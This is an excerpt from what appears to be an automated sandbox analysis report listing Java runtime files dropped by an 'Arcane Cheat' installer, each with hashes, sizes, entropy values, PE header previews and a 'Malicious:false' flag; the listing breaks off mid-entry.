                                SHA-256:C9742396B80A2241CE5309C388B80000D0786A3CAB06A37990B7690FD0703634
                                SHA-512:AA324A265639C67843B4BF6828029B413044CBE4D7F06A253B78B060EA554FECC6E803D59D03742C485B2EB3D52E5C0A44928DCC927501F413EE4664BB8A11F5
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f.4Z..gZ..gZ..g.}g^..gWUggX..gWUeg\..gWUZgW..gWU[g_..g..qg]..gZ..g...g'~Zg~..g'~[g...g'~fg[..gWUag[..g'~dg[..gRichZ..g........PE..L...uPjW...........!..............................m......................................@.........................@..........d.......................@........%...................................\..@...............,............................text...{........................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javafx_iio.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126016
                                Entropy (8bit):6.608910794554507
                                Encrypted:false
                                SSDEEP:3072:oOxjjADzd+aeaPB9JhjxkM2wzGdXJbD/jn8Y6:ocKzeaPB9JhjxknwzG5JbDb8F
                                MD5:01706B7997730EAA9E2C3989A1847CA6
                                SHA1:7CEAD73CBE94E824FA5E44429B27069384BFDB41
                                SHA-256:20533C66C63DA6C2D4B66B315FFCF5C93AE5416E3DAE68CDD2047EFE7958AB3A
                                SHA-512:3272C8DE6C32D53372D481441DA81AE2B6EA02E8360B23D7F793B24827BD683A6604F43BE18CE2BEE40038FBE7D5F7AF78B2C465A51F82478D881DBEB5744DC2
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........y.r.*.r.*.r.*O..*.r.*.r.*.r.*. .*.r.*. .*.r.*. 0*.r.*. 1*.r.*..0*.r.*...*.r.*. .*.r.*...*.r.*Rich.r.*........PE..L...vPjW...........!.........:.....................m................................c.....@.....................................<.......................@.......\...................................0...@............................................text... ........................... ..`.rdata..8(.......*..................@..@.data...............................@....rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javaw.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191552
                                Entropy (8bit):6.744419946343284
                                Encrypted:false
                                SSDEEP:3072:lScg0xvhTZNIs3Ft+STckCBQo3C0Y22vncTBfsO9jZqMN3cH1Tefqk:lSclI6nTc3BQo3C0YHncTBxvs65
                                MD5:48C96771106DBDD5D42BBA3772E4B414
                                SHA1:E84749B99EB491E40A62ED2E92E4D7A790D09273
                                SHA-256:A96D26428942065411B1B32811AFD4C5557C21F1D9430F3696AA2BA4C4AC5F22
                                SHA-512:9F891C787EB8CEED30A4E16D8E54208FA9B19F72EEEC55B9F12D30DC8B63E5A798A16B1CCC8CEA3E986191822C4D37AEDB556E534D2EB24E4A02259555D56A2C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v...%...%...%..w%...%.7D%...%.7q%...%..|%...%...%...%.7E%*..%.7u%...%.7r%...%Rich...%........................PE..L....DjW.....................(...................@..........................0............@.................................\*..d.......................@............................................$..@............................................text............................... ..`.rdata...t.......v..................@..@.data....4...@......."..............@....rsrc................8..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\javaws.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):269888
                                Entropy (8bit):6.418120581797452
                                Encrypted:false
                                SSDEEP:6144:Fp9B0qT85g5Sq+VBY2qVLC2wH5rM8HoQvlHO:5uqT85sSq+ERVm2wZEQvlHO
                                MD5:F8211DB97BF852C3292C3E9C710C19D9
                                SHA1:46DAD07779E030D8D1214AFE11C4526D9F084051
                                SHA-256:ECF4307739CA93F1569CE49377A28B31FE1EB0F44B6950DBAAFA1925B24C9752
                                SHA-512:B3E20EECA87136CAE77F06E4149E65EBFEF71A43589F7E2833008FE43811A2BC8B6202B6ADB5CE122A1822E83CE226B833DEF93A2B161476BD5B623794E4F697
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a..L%...%...%...>c..8...J.4.-...,.......%.......>c5.....>c4.....>c..$...>c..$...Rich%...................PE..L...rGjW.................t...........C............@..................................a....@.................................L...x.......................@.......8................................... ...@...............h...T........................text....r.......t.................. ..`.rdata...c.......d...x..............@..@.data...8........z..................@....rsrc................V..............@..@.reloc..>-..........................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jawt.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):13888
                                Entropy (8bit):6.274978807671468
                                Encrypted:false
                                SSDEEP:192:ahKnvndLwm3XLPVlD6yTUZnYe+PjPriT0fwdNJLkoRz:a4j7PVl1TAnYPLr7cLka
                                MD5:0291BA5765EE11F36C0040B1F6E821FB
                                SHA1:FFE1DCF575CCD0374DF005E9B01D89F6D7095833
                                SHA-256:F8540BE2BBD5BDE7962D2FE4E7EC9EF9BF53D95B48781AE549AA792F10032485
                                SHA-512:72ADDC631D8CF064E1B047B51EEF7F306CA959D24ED705065C33EE8DDDF7EA84B95B3DE5B0709015A81D36ACA01E15CE99A354D4069D4D798ED128A6A76D1010
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"._9LR_9LR_9LRD..R^9LRD..RS9LRD..RZ9LRVA.R]9LR_9MR|9LRD..R\9LRD..R^9LRD..R^9LRD..R^9LRRich_9LR........PE..L...xPjW...........!......................... .....m.........................`............@..........................&..J...\"..P....@..................@....P..@.... ...............................!..@............ ...............................text............................... ..`.rdata..Z.... ......................@..@.data...`....0......................@....rsrc........@......................@..@.reloc..t....P......................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jdwp.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.783788147675078
                                Encrypted:false
                                SSDEEP:3072:XrQPwE5tlGsXVomHvD+1febSICzqozXtrQwnNZkB+5:XU15tpX9HvsfrTtMwNWBY
                                MD5:6E08D65F5CBB85E51010F36A84FC181D
                                SHA1:4EEE8BE68BAAF6320AEA29131A1C0B322F09F087
                                SHA-256:2D8658909D9E357A4B70FCF862D690EEC82A2F77161ABB021E0839C6A67D4825
                                SHA-512:DF4494D062E9A8AC82D727D2722DCF32C3FC924FA104F384FA099ADB08ECBDEEA7A19245D779097C0AFCF51F84852328ED595C88380F42BD39560678C8AD9621
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#..cp..cp..cp...p..cp...p..cp.D.p..cp..bp..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cpRich..cp........................PE..L...{PjW...........!...............................m......................................@......................... ?..h...|9..<....P...............h..@....`...)..@...............................(8..@...............,............................text............................... ..`.rdata..._.......`..................@..@.data...0....@.......4..............@....rsrc........P.......8..............@..@.reloc...+...`...,...<..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jfr.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):22592
                                Entropy (8bit):6.620820751411794
                                Encrypted:false
                                SSDEEP:384:YL4Z7lZRiY3PB6cGgOp2m1zq2oatSnPV5zYxkpLfsnYPLr7Ybc:E4PZRiY3PB6cVAebaMnd+ypLkC7Cc
                                MD5:700F5789D2E7B14B2F5DE9FDB755762E
                                SHA1:F35EDE3441D6E5461F507B65B78664A6C425E9AC
                                SHA-256:D115EAF96BD41C7A46400DCFF7EF26AC99E3CF7A55A354855C86BAE5C69A895A
                                SHA-512:664A442DD424CA04AC0CE072B9BBD5EF7C657B59A26403C44A856738F7998466BFE3010825A13451281841D39B0A34D8997EE24497D626EC60C19AA1AF0EE465
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W..W..W../j.W...e.W..W..W....a.W...g.W...R.W...S.W...b.W...c.W...d.W..Rich.W..........PE..L...|PjW...........!........."......T&.......0.....m.................................O....@.........................`>.......:..<....`...............@..@....p.. ....0...............................9..@............0...............................text...^........................... ..`.rdata..p....0....... ..............@..@.data........P.......6..............@....rsrc........`.......8..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxmedia.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115264
                                Entropy (8bit):6.588792190592223
                                Encrypted:false
                                SSDEEP:3072:2Cgsy+/cydqNiaZr+lOzZPh7/W4MCnc8Ioaa2yFWcC6vsx/8:FZOzZPh7/WSe+S6v+U
                                MD5:8BC8FE64128F6D79863BC059D9CC0E2E
                                SHA1:C1F2018F656D5500ACF8FA5C970E51A55004DA2E
                                SHA-256:B77CD78FF90361E7F654983856EE9697FDC68A0F9081C06207B691B0C9AF1F5D
                                SHA-512:6771F23ECF1A449EB6B0B394E0F1D3EB17C973FC0544BA25487C92F215ACC234FC31C9B7BE5528EFD06D29A35BB37DD7934318837576862ADFC2631B4D610A24
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l..>7..l..>...l..>5..l..>...l...#..l..5..l..l.zl.....l.....l..4..l..>3..l..6..l.Rich.l.........PE..L...}PjW...........!.........|......],.......@.....m................................~.....@.....................................x.......................@............................................h..@............@...............................text....-.......................... ..`.rdata..4Z...@...\...2..............@..@.data...4...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jfxwebkit.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33934912
                                Entropy (8bit):6.35314231534845
                                Encrypted:false
                                SSDEEP:393216:VJ8d7SMzwH5R2sdDcBwHHdI4DKRlDsqXCagQZhzvilh2Wlq7ODI:VJ8d7zzUesdDtevn
                                MD5:4D857A5FC9CA16D2A67872FACCF85D9F
                                SHA1:EAEB632E526EFA946E4DB1B8CFA31DE6A7B03219
                                SHA-256:7FFA7423DDA07499394B345E5ECE2D54C8E19247E6E76C0E23B5BF1470AB0D7F
                                SHA-512:8DBC8675CE2DACE8D629C3FA66CF65704346AB829AE0B0A1D7B25BE22783B7E73624BA70F6D67264D6CA1656D7590E3753A8DF2227DA45112C5BD4A5654089AF
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........O..z!..z!..z!.c...z!..(...z!..(...z!......z!..z!..z!..(..hz!..(...z!......z!. ...z!..z ..{!......p!......z!..(...z!......z!.Rich.z!.................PE..L...~PjW...........!......... $....................m......................................@.................................X...x.......@...............@..............................................@............................................text.............................. ..`.rdata...E.......F..................@..@.data..............................@....unwante............................@..@.rsrc...@...........................@..@.reloc.............................@..B........................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jjs.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475020301731584
                                Encrypted:false
                                SSDEEP:384:GpsE5cnm6ObmSHhV8j0eeq4SziahnYPLr79OOu:Gpszn6iS/8jxeqfhC78Ou
                                MD5:4F11D43AA2215CE771DA528878F01C8E
                                SHA1:8062681D73489FF200CA0BA426FF1FF3F44494A7
                                SHA-256:0D554CD4B373D6D9B9C179A468D179388706C0BDE4D878ED75EF575651588B3C
                                SHA-512:34CB271C32FB479CFAEEC536A5D35A41730E90001D67DC9DB595DB240A1F58C3BF12334BB5CDE7673C8E56A4C272BFBD66E4EACDEE0082F6FD583E4E039EC540
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......C....@.................................$#..P....@..@............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...@....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jli.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):158784
                                Entropy (8bit):6.816453355323999
                                Encrypted:false
                                SSDEEP:3072:gLkNbBRaz4rQWiG6wMz9/S3en9pHUw06TBfkqI44:rNbB4Mcnv7z6en9pj06TB6
                                MD5:73A76EC257BD5574D9DB43DF2A3BB27F
                                SHA1:2C9248EAE2F9F5F610F6A1DFD799B0598DA00368
                                SHA-256:8F19B1BA9295F87E701C46CB888222BB7E79C6EE74B09237D3313E174AE0154F
                                SHA-512:59ECD5FCF35745BDADCDB94456CB51BB7EA305647C164FE73D42E87F226528D1A53CE732F5EC64CE5B4581FA8A17CFBFDC8173E103AE862D6E92EB3AD3638518
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................6...........0.....=............7....5.....4.....3....Rich............PE..L....PjW...........!...............................o................................Y.....@..........................3..m....*..d....................T..@............................................#..@............................................text...~........................... ..`.rdata...u.......v..................@..@.data....4...@......."..............@....rsrc................6..............@..@.reloc.."............:..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2iexp.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):207424
                                Entropy (8bit):6.630800216665857
                                Encrypted:false
                                SSDEEP:6144:ckZ5ktGCru8e6Y3RhNw0mjs+OBS7n7ACKRAHbW:ciIbS6Y37Nw0/QC
                                MD5:475DD87198F9C48EFB08AAB4ADE8AF5A
                                SHA1:9B657E0837639663D4D721F8C5E25401F11E7BEB
                                SHA-256:32764005FCCE7D0E51801528F6B68C860979E08D027A5220DFEC19B2A8013354
                                SHA-512:0B492B0FBADC14178A6F79A58E47C30D92B59B18414E38A7B119699D0788ACF3713F925CF0EC570BE3E29AB26BDB6B567C38526BC0603BA78ECC3E2952EA3E2B
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.*...*...*.......*.......*.;....*.......*.......*...+...*.......*.......*.......*.......*.......*.......*.Rich..*.........................PE..L....PjW...........!.........>.....................o.........................P............@.............................................................@......../...................................C..@...............|...........................text.../........................... ..`.rdata..............................@..@.data....,.......&..................@....rsrc...............................@..@.reloc...6.......8..................@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2launcher.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):82496
                                Entropy (8bit):6.597347722250847
                                Encrypted:false
                                SSDEEP:1536:ez2dfBusTTkMffX+xR5kdt94u+508AqDfJOqsbCkq24maADX:kE5u+kkX+P+dt9O08JJOZXX4nADX
                                MD5:5F85F7F2DFAC397D642834B61809240F
                                SHA1:ECA28E8464208FA11EF7DF677B741CDD561483D9
                                SHA-256:B71E00ADB77D87882D58993A5888955BDD62C57D364F60AAA0FA19D32A69C9DA
                                SHA-512:2BFE9FCE450E57EA93DEEAA85A746CB17BA946EEFF866F10D67C74F7EA038B16910E0D8EF29E9F358AF7DAABD45E3983C370FEF82A9647546819DCDE3AEE45BC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-..C..C..C.....C..3..C.v...C..3..C..B.X.C.....C..3..C..3...C..3..C..3..C.Rich.C.........PE..L....HjW............................1.............@.................................cE....@.................................\...x....`..H............*..@....p..h.......................................@............................................text............................... ..`.rdata...C.......D..................@..@.data....0... ......................@....rsrc...H....`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2native.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19008
                                Entropy (8bit):6.372096409611824
                                Encrypted:false
                                SSDEEP:384:PTjlu57T5J5eFeYW7TPVlN3B+ASZQ4NNR7F3qnYPLr7om0:PnUd5eFeDfd5Sj7oC7om0
                                MD5:4023E25F92B5F13E792901BF112A8EA2
                                SHA1:31ADCD411905832B89EA55DEC8B9C83AF3C7D3EA
                                SHA-256:432AEDAC59FA161FED5A5D95CA5F8CFD1D73A35ABE8A7090D137100F727B687B
                                SHA-512:AD0E6F8071EB09E843989E637BACA988DD7706D84FC26DB7C2E18BBE03A78A6C5BFE4F1B28289B5929B2B86C53FB6C3DAE42523DC8EDE8057A8F431AEA77BB20
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~fQ.~fQ.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQ.~gQ.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQRich.~fQ................PE..L....PjW...........!.........................0.....o.........................p.......8....@..........................8......43..P....P...............2..@....`.......1..............................P1..@............0.......2..@....................text............................... ..`.rdata..T....0......................@..@.data........@.......&..............@....rsrc........P.......*..............@..@.reloc..J....`......................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jp2ssv.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):186944
                                Entropy (8bit):6.612459610032652
                                Encrypted:false
                                SSDEEP:3072:XsSFQQB7SGWV2xrkvql6QPJD7mGVqjLypDTaDE5zwmFxy7HglbZrdIG:XJ97PxYAPJ/RV0tDCzw+xy0ldOG
                                MD5:E9373908186D0DA1F9EAD4D1FDAD474B
                                SHA1:C835A6B2E833A0743B1E8F6F947CFE5625FE791F
                                SHA-256:E2FBD6C6334D4765FF8DFF5C5FE3DF8B50015D0BF9124142748FADB987B492FF
                                SHA-512:BFDC236D462DAC45FD63C112E40558ED4E11E76FB4D713926A679FD573F67FA16451231A03178926B76BD267F092A33A3B6760CF4812DE2679BB9505B83F8261
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.+.#.x.#.x.#.x.mGx.#.x..Ax.#.x..ux3#.x.[Lx.#.x.[\x.#.x.#.x #.x.Utx.#.x..tx.#.x..Dx.#.x..Ex.#.x..Bx.#.xRich.#.x................PE..L....PjW...........!................K........ .....o................................,j....@................................. ...d.......................@............"...............................f..@............ ..P...L|.......................text...\........................... ..`.rdata...m... ...n..................@..@.data....5...........z..............@....rsrc...............................@..@.reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jpeg.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):145984
                                Entropy (8bit):6.69725055196282
                                Encrypted:false
                                SSDEEP:3072:S2yRKm4/j/dKLnjHy7OMD+MqS1RYio7+oD33GnUV0fem2M:S2ytqlYnjHehDzqiq+oD33OUV8Vx
                                MD5:4294D39CC9E5F23754D41B9DDE710112
                                SHA1:1BAA1E136F18108AB4E31EC005DEC54FC3F23A7C
                                SHA-256:DE3EEDED01B35DC7C29B0B758211BB1DB73CCFFB9298D281DAF56924ED9E93CB
                                SHA-512:E88DFF129DD35445B32A2DBCAB97CF752E9ACDF82FF88B184FA6D3B461D55BD2D195794802C5BA5E7EFFA086DC89E0C2CEF0C8B0BFA29AC70B75CFB1B4B0584C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........:.j.i.j.i.j.i..5i.j.i..8i.j.i...i.j.i..:i.j.i.j.i.j.i...i.j.i..=i.j.i..<i.j.i..;i.j.iRich.j.i................PE..L....PjW...........!.........P......)..............o.........................`............@.........................."..X.......P....@..............."..@....P..........................................@............................................text...N........................... ..`.rdata...9.......:..................@..@.data........0......................@....rsrc........@......................@..@.reloc..4....P......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jsdt.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.482296988184946
                                Encrypted:false
                                SSDEEP:384:n11I27Bf0jeZy+hiqEyRoPV527rBnYPLr7/U:nrJfYqodYJC78
                                MD5:4BDF31D370F8A893A22820A3B291CC1D
                                SHA1:BD27656B42F881EEE1940CFE15CF84C1938B57BA
                                SHA-256:C98DFAC99CC1E05D5F86B2577031A7624DCC13D0A8344B2855F166335177BC16
                                SHA-512:51623274C13DA71AD01DBAD7950444B512F08C3DC04E27F0321DF02E9F3C4DFB308DEF35F58524CCCCE79ED2A8859D85C16DC0D9BEA378E5538E23602D35AA76
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.m..d>..d>..d>.b.>..d>...>..d>..e>..d>...>..d>...>..d>...>..d>...>..d>...>..d>...>..d>Rich..d>........................PE..L....PjW...........!.........................0.....o.........................p......n.....@.........................P8..:....4..<....P...............(..@....`.......0...............................3..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jsound.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.609051738644882
                                Encrypted:false
                                SSDEEP:384:mk87qhVj8sqgP7CRLMOPfkGo7UdJs0flkg2uG8RPGHTR5ny5pnYPLr7z:mk87qhVjaMOPJdJFflLJR+V03C7z
                                MD5:7BD914407C6D236B27865A8C63147B7F
                                SHA1:9B49E48705341D30E3F92B85652E924C7985E415
                                SHA-256:549849DC910261D817670B192715430395993E811D0FD3103651237D7F18929D
                                SHA-512:624DC95F696BEA311726EAFB0017F363C8703B95A2E08DE984C642867888CF5B9172326C2E2567ED4A2EA28F806B633840552C80BE49EB6CF2A8FC4A0C259117
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Nu.h &.h &.h &...&.h &...&.h &...&.h &.h!&_h &...&.h &...&.h &...&.h &...&.h &...&.h &Rich.h &........PE..L....PjW...........!.....8...(.......A.......P.....o.................................G....@.........................P^.......V..P....................`..@...........`Q...............................U..@............P..D............................text...66.......8.................. ..`.rdata.. ....P.......<..............@..@.data...$....p.......V..............@....rsrc................X..............@..@.reloc...............\..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\jsoundds.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):27712
                                Entropy (8bit):6.6264206752006825
                                Encrypted:false
                                SSDEEP:768:hgWe1DWI+mB7JkJKe3xVF2XNbuHEqe8yIGn3zY9pcQ/oGmEsg0sqkgiHmNs2Qd6X:qWbEK1Ms2dYJG
                                MD5:6280201C1918EA3293919BB282D2B563
                                SHA1:3F6F5299A435E2A0C36BE8AAD4CB2FCAACD0897D
                                SHA-256:0711127A297E4CC1927D77013FC040CAA26930C34A4C7B4D7631BCE9C8041B74
                                SHA-512:A4C4507ED4FDEC038FAFA62970161E7B75FF9A2ABBDF854ED55483144DCDC0FC9D21235FDDDF1B38303723F9C615AE388397C4D17B5391D8827A5B40AC52C5FC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q...q...q.......q.......q.......q...q...q....=..q....<..q.......q.......q.......q..Rich.q..........................PE..L....PjW...........!.....6...$.......?.......P.....o................................p;....@.........................0Y.......S.......p...............T..@.......0....Q...............................R..@............P...............................text...f4.......6.................. ..`.rdata.......P.......:..............@..@.data...L....`.......J..............@....rsrc........p.......L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\kcms.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):178240
                                Entropy (8bit):6.793245389378621
                                Encrypted:false
                                SSDEEP:3072:gWosiKTxga2KtpdhEnGF5PNyR0BxDxxKF5HkEWnuYsauj9Fom1QB:3RRKAtpdhEn/0BzwFpvYm0z
                                MD5:BF299F73480AF97A750492E043D1FADD
                                SHA1:C93C4A2DAE812F31603E42D70711D3B6822F9E8E
                                SHA-256:0334E3B7AE677116B92516172D0CA905723DAF847D8B3B0DC3FC118EDC703D51
                                SHA-512:7265783F0DD653DBC4693D5EFEB156281620C5421F29910F14C22B75A936233E9E897087E64B641335795484837F28F113EE9F380027698A898F19115FD0F648
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..di..di..di.k.i..di.k.i..di...i..di.k.i..di..ei..di.k.i..di.k.i..di.k.i..di.k.i..diRich..di................PE..L...pPjW...........!.....^...F.......g.......p.....o.................................Z....@.............................d....x..P.......h...............@....... ...`q..............................pw..@............p..H............................text....\.......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....rsrc...h...........................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\keytool.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.474237923131844
                                Encrypted:false
                                SSDEEP:384:Gps45cnQ6DmSHhV8r0eeU4Szi6nYPLr70aG:Gpsnn4S/8rxeUvC7RG
                                MD5:9A4CF09834F086568DF469E3F670BF07
                                SHA1:594C4E0394475A6299C79E3A063C7D5AE49635F3
                                SHA-256:709E9E544434C52285A72F29AD6B99CE1E7668545F10AD385C87ABF34D2052BB
                                SHA-512:CD551E7944461F3288B880B9D161F19F97EB4599A3A46CC93C4172B5112960FB0C040B9996F13CF0761FB85A283E2F20944135EC59660C807A59B29CDDC44586
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`.......@....@.................................4#..P....@..T............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...T....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\kinit.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
